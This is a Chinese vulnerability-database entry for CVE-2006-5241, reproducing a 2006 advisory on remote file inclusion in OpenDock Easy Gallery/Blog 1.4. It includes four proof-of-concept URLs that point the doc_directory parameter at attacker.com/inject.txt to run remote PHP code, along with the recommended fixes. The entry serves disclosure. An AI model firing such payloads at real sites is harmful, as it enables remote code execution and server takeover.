OpenDock Easy Blog 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111219 漏洞类型 输入验证
发布时间 2006-10-09 更新时间 2006-10-20
CVE编号 CVE-2006-5241 CNNVD-ID CNNVD-200610-185
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2497
https://cxsecurity.com/issue/WLB-2006100075
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-185
|漏洞详情
OpenDockEasyBlog1.4以及之前的版本,在启用register_globals的情况下,其存在多个PHP远程文件包含漏洞,远程攻击者可以通过(1)file.php;sw/lib_user/中的(2)find_user.php,(3)lib_user.php,(4)lib_form_user.php和(5)user.php;sw/lib_session/中的(6)find_session.php和(7)session.php;sw/lib_comment/中的(8)comment.php和(9)lib_comment.php以及其他未明PHP脚本中的doc_directory参数包含的URL来执行任意PHP代码。
|漏洞EXP
ECHO_ADV_52$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_52$2006]OpenDock Easy Gallery <=1.4 (doc_directory) Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author          : Dedi Dwianto a.k.a the_day
Date Found      : October, 09th 2006
Location        : Indonesia, Jakarta
web             : http://advisories.echo.or.id/adv/adv52-theday-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application     : OpenDock Easy Gallery
version         : <=1.4
URL             : http://web.opendock.net

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~

In folder sw/lib_up_file/ I found vulnerability script file.php
--------------------------file.php---------------------------------------
....
<?

 include $doc_directory.$path_sw."lib_up_file/lib_file.php";
 include $doc_directory.$path_sw."lib_up_file/lib_form_file.php";
 include $doc_directory.$path_sw."lib_up_file/lib_read_file.php";
 include $doc_directory.$path_sw."lib_up_file/lib_page_file.php";
 include $doc_directory.$path_sw."lib_up_file/find_file.php";
 include $doc_directory.$path_sw."lib_up_file/down_stat.php";

...
----------------------------------------------------------

Input passed to the "$doc_directory" parameter in file.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files on Files:

sw/lib_user/find_user.php
sw/lib_user/lib_user.php
sw/lib_user/lib_form_user.php
sw/lib_user/user.php
sw/lib_session/find_session.php
sw/lib_session/session.php
sw/lib_comment/comment.php
sw/lib_comment/lib_comment.php
etc..



Proof Of Concept:
~~~~~~~~~~~~~~

http://target.com/[OpenDockEasyGallery_Path]/sw/lib_user/find_user.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyGallery_Path]/sw/lib_user/user.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyGallery_Path]/sw/lib_comment/comment.php?doc_directory=http://attacker.com/inject.txt?
http://target.com/[OpenDockEasyGallery_Path]/sw/lib_session/session.php?doc_directory=http://attacker.com/inject.txt?

Solution:
~~~~~~
- Sanitize variable $doc_directory on affected files.
- Turn off register_globals

Timeline:
~~~~~~
09 - 10 - 2006 Bugs Found
09 - 10 - 2006 Vendor Contact
09 - 10 - Public Disclosure

---------------------------------------------------------------------------

Shoutz:
~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,boom_3x,mathdule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~
    EcHo Research & Development Center
    the_day[at]echo[dot]or[dot]id

# milw0rm.com [2006-10-09]
|参考资料

来源:XF
名称:opendock-gallery-docdirectory-file-include(29417)
链接:http://xforce.iss.net/xforce/xfdb/29417
来源:BID
名称:20411
链接:http://www.securityfocus.com/bid/20411
来源:BUGTRAQ
名称:20061009[ECHO_ADV_52$2006]OpenDockEasyGallery<=1.4(doc_directory)MultipleRemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/448027/100/0/threaded
来源:MILW0RM
名称:2497
链接:http://www.milw0rm.com/exploits/2497
来源:VUPEN
名称:ADV-2006-3969
链接:http://www.frsirt.com/english/advisories/2006/3969
来源:SECTRACK
名称:1017021
链接:http://securitytracker.com/id?1017021
来源:SECUNIA
名称:22337
链接:http://secunia.com/advisories/22337
来源:MISC
链接:http://advisories.echo.or.id/adv/adv52-theday-2006.txt
来源:SREASON
名称:1708
链接:http://securityreason.com/securityalert/1708
来源:MILW0RM
名称:2497
链接:http://milw0rm.com/exploits/2497